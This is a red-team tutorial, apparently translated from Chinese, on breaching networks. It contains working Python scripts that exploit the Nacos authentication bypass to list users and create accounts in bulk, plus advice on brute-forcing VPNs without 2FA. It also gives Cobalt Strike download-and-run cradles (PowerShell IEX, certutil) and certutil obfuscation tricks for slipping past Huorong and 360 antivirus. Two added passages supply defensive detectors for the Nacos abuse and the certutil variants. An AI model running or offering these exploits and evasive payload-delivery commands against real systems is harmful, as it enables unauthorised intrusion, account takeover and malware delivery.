“Challenging Red Team Practice: Optimizing Attack and Defense Techniques, Exploring Hands-On Internal Network Ranges”

External foothold

The three asset-mapping engines

https://hunter.qianxin.com/
https://fofa.info/
https://quake.360.cn/

Finding high-value assets

https://github.com/EdgeSecurityTeam/EHole

EHole has been rewritten; download the source code and compile it yourself, since the release is the old version.

[Image 1]

https://github.com/lijiejie/BBScan

Finding sensitive information and admin panel addresses. BBScan usage:

Targets:

--host [HOST [HOST ...]]
                      Scan several hosts from command line
-f TargetFile         Load new line delimited targets from TargetFile
-d TargetDirectory    Load all *.txt files from TargetDirectory
--crawler CrawlDirectory
                      Load all *.log crawl files from CrawlDirectory
--network MASK        Scan all Target/MASK neighbour hosts,
                      should be an integer between 8 and 31

HTTP SCAN:

--rule [RuleFileName [RuleFileName ...]]
                      Import specified rule files only.
-n, --no-crawl        No crawling, sub folders will not be processed
-nn, --no-check404    No HTTP 404 existence check
--full                Process all sub directories

Scripts SCAN:

--scripts-only        Scan with user scripts only
--script [ScriptName [ScriptName ...]]
                      Execute specified scripts only
--no-scripts          Disable all scripts

CONCURRENT:

-p PROCESS            Num of processes running concurrently, 30 by default
-t THREADS            Num of scan threads for each scan process, 3 by default

OTHER:

--proxy Proxy         Set HTTP proxy server
--timeout Timeout     Max scan minutes for each target, 10 by default
-md                   Save scan report as markdown format
--save-ports PortsDataFile
                      Save open ports to PortsDataFile
--debug               Show verbose debug info
-nnn, --no-browser    Do not open web browser to view report
-v                    show program's version number and exit

Shiro exploitation

Once the key is found, the common exploit tools may still fail to exploit it, and many people give up at that point; those two tools lack some of the gadget chains, so the vulnerability can be missed.

[Image 2]
[Image 3]
[Image 4]
[Image 5]
[Image 6]

Brute force where two-factor authentication is missing

Many VPN and mail systems enforce no limit on authentication attempts, so they can be brute-forced.

For example Global-Protect: a quick Google search shows it serves as a firewall plus VPN.

[Image 7]

Source code leaks

Search GitHub for keywords related to the target, e.g. password xx.com

[Image 8]

Leaked source projects may contain all kinds of passwords; alternatively, extract the application's fingerprint, find its source code, and audit it.

[Image 9]
[Image 10]

Webpack endpoints

More and more of the systems we test are bundled with webpack, recognisable by the fingerprint shown in the image below.

[Image 11]

Automated tool for finding unauthenticated endpoints

https://github.com/rtcatc/Packer-Fuzzer

Or read the JS to recover the endpoints

Right-click, view source, locate the JS files, and append .map to the URL:
curl -O http://xx.xx.xx.xx/*.js.map

[Image 12]
[Image 13]

Weak passwords + admin panel upload

When a site has no CAPTCHA, you can try brute-forcing it.

[Image 14]
[Image 15]
[Image 16]

Nacos exposed on the public internet

[Image 17]

https://github.com/Pizz33/nacos_vul

Batch verification:

import requests
import urllib3
urllib3.disable_warnings()

# Custom path and headers
custom_path = '/nacos/v1/auth/users?pageNo=1&pageSize=2'
proxies = {'http': 'http://127.0.0.1:8080'}
header = {
    "User-Agent": "Nacos-Server",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
    "Authorization": "Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding": "gzip, deflate",
    "Connection": "close",
    "Upgrade-Insecure-Requests": "1",
    "Sec-Fetch-Dest": "document",
    "Sec-Fetch-Mode": "navigate",
    "Sec-Fetch-Site": "same-origin",
    "Pragma": "no-cache",
    "Te": "trailers",
    "Cache-Control": "no-cache",
}
# Read the URL list from url.txt
with open('url.txt', 'r') as f:
    urls = f.read().splitlines()

# Send a GET request to each target and judge by the response body
for url in urls:
    full_url = url + custom_path  # build the full URL
    try:
        response = requests.get(full_url, proxies=proxies, headers=header, verify=False, timeout=2)
        if response.status_code == 200 and response.content.find(b"pageNumber") != -1:
            print(f'{url} 存在nacos身份验证绕过漏洞')
        else:
            print(f'{url} 不存在nacos身份验证绕过漏洞')
    except requests.exceptions.RequestException as e:
        print(f'{url} 访问失败 {e}')

[Image 18]

Scripted user creation:

import sys
import threading
import requests
from termcolor import colored
import urllib3
urllib3.disable_warnings()

proxies = {'http': 'http://127.0.0.1:8080'}
# Read the target URL(s) from the command line; each one is handled in its own thread
if len(sys.argv) < 2:
    print("Usage: python test.py <url> [<url> ...]")
    sys.exit(1)
urls = sys.argv[1:]

post_url = "/nacos/v1/auth/users"

headers = {
    "User-Agent": "Nacos-Server",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
    "Authorization": "Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding": "gzip, deflate",
    "Connection": "close",
    "Upgrade-Insecure-Requests": "1",
    "Sec-Fetch-Dest": "document",
    "Sec-Fetch-Mode": "navigate",
    "Sec-Fetch-Site": "same-origin",
    "Pragma": "no-cache",
    "Cache-Control": "no-cache",
}
data = {
    "username": "test123",
    "password": "test123",
}


def send_request(url):
    """Send the user-creation request to one target and report the result"""
    request_url = url + post_url
    response = requests.post(request_url, headers=headers, data=data, proxies=proxies, verify=False)

    if response.status_code == 200 and response.content.find(b"ok") != -1:
        print(colored('[*] ' + url + ' 存在nacos身份认证绕过漏洞!', 'green'))
        print(colored('已创建用户test123/test123', 'green'))
    else:
        print(colored('[-] ' + url + ' 不存在nacos身份认证绕过漏洞!\n', 'red'))


threads = []
for url in urls:
    t = threading.Thread(target=send_request, args=(url,))
    threads.append(t)
    t.start()

# Wait for all threads to finish
for t in threads:
    t.join()

[Image 19]
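A defender-side counterpart to the two scripts above, added here as an example and not part of the original post: both scripts rely on the `User-Agent: Nacos-Server` header that a Nacos server used to trust as a cluster-peer identity, aimed at `/nacos/v1/auth/users`. The check below parses constructed nginx-style access-log lines (not real data) and flags successful calls to that API that carry the header from an address outside the cluster; the cluster ranges 10.0.0.0/8 and 192.168.0.0/16 are assumptions for the example.

```python
import re

# Constructed nginx-style access-log lines (not real data): combined log format.
# The last two mimic the header pattern the scripts above send, the "Nacos-Server"
# User-Agent against the user-management API, from a non-cluster address.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2024:10:01:02 +0800] "GET /nacos/v1/ns/instance/list?serviceName=app HTTP/1.1" 200 512 "-" "Java/1.8.0_292"
10.0.0.5 - - [10/Mar/2024:10:01:03 +0800] "POST /nacos/v1/auth/login HTTP/1.1" 200 211 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2024:10:02:10 +0800] "GET /nacos/v1/auth/users?pageNo=1&pageSize=2 HTTP/1.1" 200 340 "-" "Nacos-Server"
203.0.113.7 - - [10/Mar/2024:10:02:11 +0800] "POST /nacos/v1/auth/users HTTP/1.1" 200 2 "-" "Nacos-Server"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"'
)

# Address ranges where genuine Nacos cluster members live (assumption for this example).
CLUSTER_PREFIXES = ("10.", "192.168.")


def parse_line(line):
    """Return the log fields as a dict, or None if the line is not in combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_bypass_attempt(rec):
    """A request that claims cluster identity via User-Agent, comes from outside the
    cluster and successfully reaches /nacos/v1/auth/users is treated as a bypass."""
    if rec["ua"] != "Nacos-Server" or rec["ip"].startswith(CLUSTER_PREFIXES):
        return False
    return rec["path"].startswith("/nacos/v1/auth/users") and rec["status"] == "200"


def find_bypass_attempts(log_text):
    """Scan a whole log and return (ip, method, path) for every flagged request."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and is_bypass_attempt(rec):
            hits.append((rec["ip"], rec["method"], rec["path"]))
    return hits


if __name__ == "__main__":
    for hit in find_bypass_attempts(SAMPLE_LOG):
        print("possible Nacos auth bypass:", hit)
```

On the server side the lasting fix is to enable authentication, replace the default token secret key, and identify cluster peers with `nacos.core.auth.server.identity.key`/`value` instead of the User-Agent whitelist (`nacos.core.auth.enable.userAgentAuthWhite=false`).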

Lateral movement

Getting a Cobalt Strike beacon

Hiding the C2 address

Cloud functions or a CDN

Standard delivery

1. powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x/a'))"
2. certutil -urlcache -split -f http://x.x.x.x/a C:\Users\Public\1.exe && C:\Users\Public\1.exe

Delivery past antivirus

Huorong

Copy the certutil binary:
copy c:\windows\system32\certutil.exe c:\programdata\a.exe && c:\programdata\a.exe -urlcache -split -f http://x.x.x.x/a C:\Users\Public\1.exe && C:\Users\Public\1.exe

360

Recover the file from the cache:
;,@certutil -u""r""l""c""a""c""h""e"" -split -f http://x.x.x.x/a.exe -DeleteHelloContainer
;,@certutil -u""r""l""c""a""c""h""e"" -split -f http://x.x.x.x/a.exe -deleteEnrollmentServer
;,@certutil -u""r""l""c""a""c""h""e"" -split -f http://x.x.x.x/a.exe -deletePolicyServer
;,@certutil -u""r""l""c""a""c""h""e"" -split -f http://x.x.x.x/a.exe -deleteEccCurve

move -deleteEccCurve test.exe

def

Insert "" characters in the middle:
cert^u^t^il -url""""cache -sp""""lit -f http://192.168.xx.xx:7070/test.txt

General: write a Python script to fuzz characters and find a variant that gets through:

import os
import random
import time


def insert_random_chinese_chars(s):
    """Insert Chinese punctuation at random positions in the string s"""
    chinese_chars = ["。", ",", "!", "》", "?", "《", ",", "】", "【", "}", "“"]
    n = len(s)
    insert_positions = sorted(random.sample(range(n), n // 4))
    for pos in reversed(insert_positions):
        s = s[:pos] + random.choice(chinese_chars) + s[pos:]
    return s


while True:
    url = "urlcache"
    url = insert_random_chinese_chars(url)
    command = f"certutil -{url} -split -f http://x.x.x.x/1.png"
    print(command)
    # Log every variant tried so the ones that get through can be identified later
    with open("output.txt", "a") as f:
        f.write(command + "\n")
    os.system(command)
    time.sleep(5)

[Image 20]
[Image 21]
[Image 22]
[Image 23]
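Detection-side example for the certutil variants in this section (renamed copy, `""` insertion, carets, inserted CJK punctuation), added here and not part of the original post: it normalises a process command line the way Windows command parsing effectively tolerates it and flags urlcache downloads. The command lines are constructed to mirror the ones above, and `original_file_name` stands for the executable's PE original filename as Sysmon Event ID 1 reports it in `OriginalFileName` (assumed to be available from the telemetry).

```python
import re

# Constructed process command lines (not captured from any real host) mirroring the
# variants in this section: plain, renamed copy, "" insertion, carets, CJK punctuation,
# plus one benign certutil use as a control.
SAMPLE_CMDLINES = [
    r'certutil -urlcache -split -f http://x.x.x.x/a C:\Users\Public\1.exe',
    r'c:\programdata\a.exe -urlcache -split -f http://x.x.x.x/a C:\Users\Public\1.exe',
    r'certutil -u""r""l""c""a""c""h""e"" -split -f http://x.x.x.x/a.exe -deleteEccCurve',
    r'cert^u^t^il -url""""cache -sp""""lit -f http://192.168.xx.xx:7070/test.txt',
    r'certutil -url。ca，che -split -f http://x.x.x.x/1.png',
    r'certutil -hashfile C:\Users\Public\setup.msi SHA256',
]

URL_RE = re.compile(r"https?://\S+")


def normalize_cmdline(cmd):
    """Strip the decorations Windows command parsing ignores: carets, empty "" pairs
    and non-ASCII filler characters; lower-case the rest so matching is case-free."""
    cmd = cmd.replace("^", "").replace('""', "")
    cmd = "".join(ch for ch in cmd if ord(ch) < 128)
    return cmd.lower()


def is_certutil_download(cmd, original_file_name=None):
    """True when the normalised command line invokes certutil's urlcache mode with a URL.
    original_file_name is the PE original filename (Sysmon Event ID 1 OriginalFileName,
    assumed available), so a renamed copy of certutil is still recognised."""
    norm = normalize_cmdline(cmd)
    tokens = norm.split()
    if not tokens:
        return False
    looks_like_certutil = "certutil" in tokens[0] or (original_file_name or "").lower() == "certutil.exe"
    return looks_like_certutil and "-urlcache" in tokens and bool(URL_RE.search(norm))


def scan(records):
    """records: iterable of (command_line, original_file_name); returns flagged command lines."""
    return [cmd for cmd, name in records if is_certutil_download(cmd, name)]


if __name__ == "__main__":
    # Pretend telemetry reported the renamed copy with its true OriginalFileName.
    names = [None, "CertUtil.exe", None, None, None, None]
    for hit in scan(zip(SAMPLE_CMDLINES, names)):
        print("certutil download:", hit)
```

Without the OriginalFileName field the renamed copy is missed, which is exactly the gap the Huorong trick above exploits; command-line matching alone is not enough.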